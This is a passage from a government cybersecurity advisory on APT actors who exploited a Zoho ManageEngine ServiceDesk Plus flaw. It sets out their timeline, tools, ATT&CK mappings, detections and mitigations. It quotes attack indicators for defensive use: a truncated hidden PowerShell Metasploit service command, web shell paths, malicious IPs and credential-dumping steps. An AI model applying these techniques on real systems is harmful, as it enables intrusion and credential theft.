ServiceDesk system. The actors dropped an Active Server Pages Extended (ASPX) web shell in the following file system location, which was designed to execute remote JavaScript code [T1059.007] on the OWA server [T1505.003]: c:\Program Files\Microsoft Office Web Apps\RootWebSite\en-us\resource.aspx Note: The administrative user’s credentials were obtained from the APT actors’ collection (LSASS dump) of credentials from the entire AD domain. This user is separate from the actor-created Azure user account. See MAR-10430311-1.v1 for additional details. 2023-02-02 18:45:58 Metasploit service installed. APT actors installed Metasploit with the following attributes on the organization’s domain controller [T1059.001]: Service Name: QrrCvbrvnxasKTSb [T1543.003] Service File Name: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4) [T1564.003] Note: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform several actions, including discovery of information and execution of code. 2023-02-03 03:27:59 ConfigLogin.aspx web shell detected. APT actors dropped an additional ASPX web shell on a web server in the following file system location: c:\inetpub\wwwrot\[REDACTED]\css\font-awesome\css\ConfigLogin.aspx See MAR-10430311-1.v1 for additional details. 2023-02-03 15:12:23 wkHPd.exe created to communicate with malicious IP 108.62.118[.]160. APT actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as wkHPd.exe [T1587.001]. This variant serves as an attack payload that runs an interactive shell and allows a malicious actor to control and execute code on a system. See MAR-10430311-1.v1 for additional details. 2023-02-08 08:56:35, 2023-02-09 20:19:59, 2023-03-04, 2023-03-18 Hypertext Preprocessor (PHP) files uploaded via HTTP-POST request from malicious IP 193.142.146[.]226. PHP files were uploaded to the ServiceDesk system via HTTP-POST request. APT actors were observed writing 16 instances of the following files to disk: [REDACTED]/wp-content/themes/seotheme/db.php (12 instances) [REDACTED]/wp-content/plugins/ioptimization/IOptimize.php (4 instances) 2023-03-06 06:49:40 Interact.sh APT actors executed Domain Name System (DNS) scanning at an additional server (not the ServiceDesk system) and directed callback to the Interact.sh domain, which indicated the server was susceptible to a DNS-style attack [T1046]. Destination IP: 103.105.49[.]108 Post-engagement analysis was extended but analysts were unable to determine additional actions taken by the APT actors, likely due to a lack of sensor coverage and data unavailability. With the data available, it was determined APT actors used the tools listed in Table 2 during their operations. Table 2: Observed Tools Used by APT Actors Tool Description Observation Mimikatz [2] A credential dumping tool capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. In addition to using Mimikatz for credential dumping, APT actors dumped the following Windows Registry Hive files: sam.hiv [T1003.002] system.hiv security.hiv These files were dumped to obtain registry information such as users on the system, data used by the operating system [T1012], and installed programs. Ngrok [3] Ngrok software operates by running a client process on the machine and creating a private connection tunnel to a designated open port. Ngrok delivers instant ingress to applications in any cloud, private network, or devices with authentication, load balancing, and other critical controls. In recent years, Ngrok has been leveraged maliciously by a variety of threat actors, including use for persistence, lateral movement, and data exfiltration.[4],[5],[6] Using Ngrok as an external service, APT actors were able to gain access to and utilize the command line on victim systems. Note: CISA and co-sealers have observed this commonly used commercial platform being abused by malicious actors to bypass typical firewall controls. Ngrok’s ability to tunnel RDP and other services securely over internet connections makes it a target for abuse by malicious actors. ProcDump A command-line application used to monitor processes and create crash dump files. A crash dump file contains the data loaded in memory at the time the dump was triggered. It is typically used for troubleshooting errors with an application or operating system. APT actors used ProcDump to conduct reconnaissance and examine spawned processes (applications in use). This tool was also utilized as a utility for dumping credentials from the server hosting ServiceDesk Plus. Metasploit Metasploit is an open-source penetration testing software.   APT actors’ specific use of Meterpreter—an attack payload of Metasploit—serves as an interactive shell and allows threat actors to control and execute code on a system. Interact.sh An open-source tool for detecting external interactions (communication).[7] This tool is used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity. APT actors likely used Interact.sh to refrain from using and disclosing their own C2 infrastructure. anydesk.exe A remote desktop application that provides platform-independent remote access to personal computers and other devices running the host application. It offers remote control, file transfer, and VPN functionality.   Between early-February and mid-March 2023, anydesk.exe was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer [T1553.002]. APT actors compromised one host and moved laterally to install the executable on the remaining two [T1570]—listed in order of time, as follows: c:\programdata\anydesk.exe c:\Users\[REDACTED]\Downloads\AnyDesk.exe c:\Users\[REDACTED]\Documents\personal\program\AnyDesk.exe Note: Analysts confirmed APT actors’ weaponized use of anydesk.exe but were unable to confirm how the software was installed on each host. quser.exe A valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server [T1049], including the name of the user, name of the session on the remote desktop session host server, session ID, state of the session (active or disconnected), idle time (number of minutes since last keystroke or mouse movement), and date/time the user logged on.[8] APT actors were observed using this tool as early as March 2023 across four locations with the same name but different hashes (one of which is associated with the Portuguese [Brazil] language pack): c:\ProgramFiles\WindowsApps\Microsoft.LanguageExperiencePackpt-BR_19041.56.186.0_neutral__8wekyb3d8bbwe\Windows\System32\pt-BR xpack.exe A custom .NET loader that decrypts (AES), loads, and executes accompanying files. Xpack.exe indicators were present on multiple organization hosts, with an unverified user account observed navigating to the sites: xpack.github[.]io and xpack.disqus[.]com. Additionally, one administrator account and multiple user accounts were observed executing the xpack.exe file from a hidden directory [T1564.001]: c:\USERS\[REDACTED]\.P2\POOL\PLUGINS\ORG.ECLIPSE.EMBEDCDT.TEMPLATES.XPACK_6.3.1.202210101738 This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration [T1074]. Note: The data exfiltrated is unknown.   MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 3-13 for all referenced APT actors’ tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 3: Resource Development Technique Title ID Use Acquire Infrastructure: Botnet T1583.005 Actors used User-Agent string Hello World as an initial step of the Mirai botnet to later download malicious artifacts. Develop Capabilities: Malware T1587.001 Actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as wkHPd.exe. This malware serves as an attack payload that runs an interactive shell; it allows for control and code execution on a system. Obtain Capabilities: Exploits T1588.002 Actors leveraged the legitimate ConnectWise ScreenConnect client to download and utilize the credential dumping tool, mimikatz.exe.   Table 4: Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 Actors exploited a known vulnerability (CVE-2022-47966) in the organization’s web server hosting Zoho ManageEngine ServiceDesk Plus. Actors also attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful.   Table 5: Execution Technique Title ID Use Command and Scripting Interpreter: PowerShell T1059.001 Actors installed and used Metasploit via PowerShell on the organization’s domain controller. Command and Scripting Interpreter: JavaScript T1059.007 Actors dropped an ASPX web shell on the OWA server, which was designed to execute remote JavaScript code.   Table 6: Persistence Technique Title ID Use Scheduled Task/Job: Scheduled Task T1053.005 Actors created the scheduled task license validf to execute ssh.exe on a recurring basis. This executable was observed as means of establishing persistence on the ServiceDesk system. Valid Accounts: Local Accounts T1078.003 Actors compromised and utilized account credentials from a previously hired contractor, of which the contract ended prior to the timeframe of observed activity. External Remote Services T1133 ssh.exe executes on a recurring basis via a scheduled task on the ServiceDesk system as a method for access via SSH. Create Account: Local Account T1136.001 Actors created a local account with administrative permissions on the server hosting ServiceDesk Plus. Server Software Component: Web Shell T1505.003 Actors logged into the OWA server from the ServiceDesk system and dropped an ASPX web shell to establish persistent access and execute remote code. Create or Modify System Process: Windows Service T1543.003 Actors created a Windows Service via Metasploit.   Table 7: Privilege Escalation Technique Title ID Use Exploitation for Privilege Escalation T1068 Through exploitation of CVE-2022-47966, actors were given root level access on the web server and created a local user account named Azure with administrative privileges.   Table 8: Defense Evasion Technique Title ID Use Indicator Removal: Clear Windows Event Logs T1070.001 Actors compromised and used disabled, legitimate administrative account credentials to delete logs from several critical servers in the environment. Masquerading: Masquerade Task or Service T1036.004 Actors created a scheduled task license validf, which appears as legitimate/benign and executes ssh.exe on a recurring basis on the ServiceDesk system. Masquerading: Masquerade File Type T1036.008 Actors attempted to export three files, which were analyzed and identified as LSASS dump files. These files were renamed with .zip and .gif extensions to evade detection. Obfuscated Files or Information: Embedded Payloads T1027.009 Actors downloaded the malware bitmap.exe on the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server. Subvert Trust Controls: Code Signing T1553.002 Anydesk.exe was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer. Hide Artifacts: Hidden Files and Directories T1564.001 Actors used xpack.exe as a method for decrypting, loading, and executing accompanying files from a hidden directory. Hide Artifacts: Hidden Window T1564.003 Actors used -w hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden.   Table 9: Credential Access Technique Title ID Use OS Credential Dumping T1003 Actors created three files as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system. OS Credential Dumping: LSASS Memory T1003.001 Actors successfully accessed and dumped credentials stored in the process memory of LSASS for the AD domain, including with the use of ProcDump. OS Credential Dumping: Security Account Manager T1003.002 Actors dumped sam.hiv to obtain information about users on the system.   Table 10: Discovery Technique Title ID Use System Network Connections Discovery T1049 Quser.exe was executed to acquire information about user sessions on a Remote Desktop Session Host server. Query Registry T1012 Actors dumped system.hiv and security.hiv to obtain information about the data used by the operating system. Remote System Discovery T1018 Actors downloaded the legitimate file/application nmap.exe via the Azure user to conduct network information gathering efforts. Network Sniffing T1040 Actors downloaded the legitimate file/application npcap.exe via the Azure user to conduct credential gathering efforts. Network Service Discovery T1046 Actors executed DNS scanning at a web server and directed callback to the Interact.sh domain, which indicated the server was susceptible to a DNS-style attack. Process Discovery T1057 ProcDump was created within the c:\windows\system32\prc64.exe directory as a method for enumerating running processes/applications.   Table 11: Lateral Movement Technique Title ID Use Remote Services: Remote Desktop Protocol T1021.001 Ngrok was used to establish an RDP connection with the ServiceDesk system. Lateral Tool Transfer T1570 Actors compromised one host and moved laterally to install anydesk.exe on two additional hosts.   Table 12: Collection Technique Title ID Use Data Staged T1074 Actors executed xpack.exe malware from a hidden directory. This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration.   Table 13: Command and Control Technique Title ID Use Application Layer Protocol: Web Protocols T1071.001 Hello World User-Agent string was identified in a HTTP request. Communication occurred between the organization’s web server and an actor-controlled C2 IP address. Remote Access Software T1219 Actors leveraged ConnectWise ScreenConnect to connect to the ServiceDesk system. Anydesk.exe was run on at least three different hosts in the environment. Non-Standard Port T1571 Actors initiated multiple TLS-encrypted sessions on non-standard TCP port 10443. Protocol Tunneling T1572 Actors were observed leveraging SSH to build a reverse tunnel with their C2 server to dynamically forward traffic into the victim organization’s environment. Using Ngrok as an external service, actors were also able to gain access to and use the command line on victim systems via RDP. Encrypted Channel: Asymmetric Cryptography T1573.002 Actors initiated multiple TLS-encrypted sessions on TCP port 10443, indicating successful exchanges of data transfer from the firewall device.   DETECTION METHODS CISA and co-sealers recommend reviewing Tables 3-13: Identified ATT&CK Techniques for Enterprise in conjunction with the detections in this section to identify similar activity. Enable logging for new user creation [DS0002], as well as monitor executed commands and arguments for actions that are associated with local account creation, such as net user /add, useradd, and dscl -create [DS0017]. Monitor for newly constructed scheduled tasks by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. Monitor for changes made to scheduled tasks that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools [DS0003]. Monitor for API calls that may create or modify Windows services (ex: CreateServiceW()) to repeatedly execute malicious payloads as part of persistence [DS0009]. Monitor executed commands and arguments that may attempt to access credential material stored in the process memory of the LSASS [DS0017]. Monitor for user accounts logged into systems associated with RDP (ex: Windows EID 4624 Logon Type 10) [DS0028]. Monitor for newly-constructed network connections associated with pings/scans that may attempt to collect a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement from the current system [DS0029]. Conduct full port scans (1-65535) on internet-facing systems—not just a subset of the ports. MITIGATIONS Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Manage Vulnerabilities and Configurations [CPG 1.E, CPG 3.A] CISA and co-sealers identified that exploitation of CVE-2022-47966 granted initial access to the public-facing application, Zoho ManageEngine ServiceDesk Plus. Multiple Zoho ManageEngine on-premises products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of version 1.4.1 of Apache XML Security for Java (also known as xmlsec) from the Apache Santuario project. Due to the xmlsec XSLT features by design in that version, the application is responsible for certain security protections. CISA and co-sealers recommend the following: Document device configurations [CPG 2.O]. Organizations should maintain updated documentation describing the current configuration details of all critical IT assets (and OT, where applicable), as this facilitates more effective vulnerability and response activities. Keep all software up to date and patch systems for known exploited vulnerabilities. In places with known exploited vulnerabilities on an endpoint device (e.g., firewall security appliances), conduct investigation prior to patching [CPG 1.E]. Follow a routine patching cycle [M1051] for all operating systems, applications, and software (including all third-party software) to mitigate the potential for exploitation. Prioritize remediation of vulnerabilities on internet-facing systems, for example, by conducting continuous automated and/or routine vulnerability scans [M1016]. CISA offers a range of services at no cost, including scanning and testing to help organizations reduce exposure to threats via mitigating attack vectors. Specifically, Cyber Hygiene services can help provide a second-set of eyes on organizations' internet-accessible assets. Organizations can email vulnerability@cisa.dhs.gov with the subject line, “Requesting Cyber Hygiene Services” to get started. For additional guidance on remediating these vulnerabilities, see CISA Insights - Remediate Vulnerabilities for Internet-Accessible Systems. Deploy security.txt files [CPG 4.C]. All public-facing web domains have a security.txt file that conforms to the recommendations in RFC 9116.[9] Segment Networks [CPG 2.F] CISA and co-sealers identified that the organization did not employ proper network segmentation, such as a demilitarized zone (DMZ), during the initial discovery phase of the incident response. A DMZ serves as a perimeter network that protects and adds an extra layer of security to an organization’s internal local area network (LAN) from untrusted traffic. Employ proper network segmentation, such as a DMZ, and ensure to address the following recommendations. Note: The end goal of a DMZ network is to allow an organization to access untrusted networks, such as the internet, while ensuring its private network or LAN remains secure. Organizations typically store external-facing services and resources, as well as servers for DNS, File Transfer Protocol (FTP), mail, proxy, Voice over Internet Protocol (VoIP), and web servers in the DMZ [CPG 2.K, CPG 2.W]. Limit internet-facing port exposure for critical resources in the DMZ networks. Limit exposed ports to only required IP addresses and avoid placing wildcards in destination port or host entries. Ensure unsecured protocols like FTP and HTTP are limited in use and restricted to specific IP ranges. If data flows from untrusted zone to trusted zone, ensure it is conducted over a secure protocol like HTTPS with mandatory multi-factor authentication. Use a firewall or web-application firewall (WAF) and enable logging to prevent/detect potential exploitation attempts [M1050]. Review ingress and egress firewall rules and block all unapproved protocols. Limit risky (but approved) protocols through rules. Use WAF to limit exposure to just approved ports, as well as monitor file changes in web directories. Implement network segmentation to separate network segments based on role and functionality. Proper network segmentation significantly reduces the ability for threat actor lateral movement by controlling traffic flows between—and access to—various subnetworks. See CISA’s Layering Network Security Through Segmentation infographic and the National Security Agency’s (NSA’s) Segment Networks and Deploy Application-Aware Defenses. Manage Accounts, Permissions, and Workstations APT actors were able to leverage disabled administrative accounts, as well as clear logs on several critical servers, which prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers recommend the following: Use phishing-resistant multi-factor authentication (MFA) [CPG 2.H] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services possible—particularly for webmail and VPNs—for accounts that access critical systems and privileged accounts that manage backups. MFA should also be used for remote logins [M1032]. For additional guidance on secure MFA configurations, visit cisa.gov/MFA and CISA’s Implementing Phishing-Resistant MFA Factsheet. Employ strong password management alongside other attribute-based information, such as device information, time of access, user history, and geolocation data. Set a password policy to require complex passwords for all users (minimum of 16 characters) and enforce this new requirement as users’ passwords expire [CPG 2.A, CPG 2.B, CPG 2.C]. Implement the principle of least privilege to decrease threat actors’ abilities to access key network resources. Limit the ability of a local administrator account to log in from a local interactive session [CPG 2.E] (e.g., “Deny access to this computer from the network”) and prevent access via an RDP session. Establish policy and procedure for the prompt removal of unnecessary (disabled) accounts and groups from the enterprise that are no longer needed, especially privileged accounts. Implement and enforce use of Local Administrator Password Solution (LAPS). Control and limit local administration, ensuring administrative users do not have access to other systems outside of the local machine and across the domain. Create a change control process for all privilege escalations and role changes on user accounts. Enable alerts on privilege escalations and role changes, as well as log privileged user changes in the network environment and create alerts for abnormal events. Create and deploy a secure system baseline image to all workstations. See Microsoft’s guidance on Using Security Baselines in Your Organization. Implement policies to block workstation-to-workstation RDP connections [CPG 2.V] through a Group Policy Object on Windows, or by a similar mechanism. The RDP service should be disabled if it is unnecessary [M1042]. Secure Remote Access Software Remote access software provides a proactive and flexible approach for organizations to internally oversee networks, computers, and other devices; however, cyber threat actors increasingly co-opt these tools for access to victim systems. APT actors were observed using legitimate remote access tools—ConnectWise ScreenConnect and AnyDesk—to connect to victim hosts within the organization’s environment and further conduct malicious operations. CISA and co-sealers recommend the following: Establish a software behavior baseline to detect anomalies in behavior [CPG 2.T, CPG 2.U]. Monitor for unauthorized use of remote access software using endpoint detection tools. For more information, see CISA’s joint Guide to Securing Remote Access Software on best practices for using remote capabilities and how to detect and defend against malicious actors abusing this software. Other Best Practice Mitigation Recommendations Use application allowlists on domain controllers, administrative hosts, and other sensitive systems. Following exploitation of the public-facing application (Zoho ManageEngine ServiceDesk Plus), APT actors were able to download and execute multiple files on the system, which were then utilized to enumerate the network and perform reconnaissance operations. Use directory allowlisting rather than attempting to list every possible permutation of applications in a network environment. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), and SYSTEM32. Disallow all other locations unless an exception is granted and documented. Application directory allowlisting can be enabled through Microsoft Software Restriction Policy or AppLocker and can prevent the execution of unauthorized software. Audit scheduled tasks and validate all findings via a Group Policy Object (GPO) or endpoint detection and response (EDR) solution. Follow Microsoft’s Best Practices for Securing Active Directory. Review NSA’s Network Infrastructure Security Guide. VALIDATE SECURITY CONTROLS In addition to applying mitigations, CISA and co-sealers recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Tables 3-13). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. CISA and co-sealers recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. RESOURCES NIST: NVD CVE-2022-47966 NIST: NVD CVE-2022-42475 CISA: KEV List MITRE ATT&CK for Enterprise v13.1 CISA, MITRE: Best Practices for MITRE ATT&CK Mapping CISA: Decider Tool CISA: Cross-Sector Cybersecurity Performance Goals CISA: Cyber Hygiene Services CISA: Remediate Vulnerabilities for Internet-Accessible Systems CISA: Layering Network Security Through Segmentation NSA: Segment Networks and Deploy Application-Aware Defenses CISA: MFA CISA: Implementing Phishing-Resistant MFA Microsoft: Using Security Baselines in Your Organization CISA: Guide to Securing Remote Access Software Microsoft: Best Practices for Securing Active Directory NSA: Network Infrastructure Security Guide DISCLAIMER The information in this report is being provided “as is” for informational purposes only. CISA, the FBI, and CNMF do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, or CNMF. REFERENCES Snort: Known Malicious User-Agent String – Mirai MITRE: Mimikatz MITRE: Ngrok AA22-320A: Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester AA22-294A: #StopRansomware: Daixin Team AA23-075A: #StopRansomware: LockBit 3.0 GitHub: Interactsh Microsoft: Quser Internet Engineering Task Force (IETF): RFC 9116 VERSION HISTORY September 7, 2023: Initial version.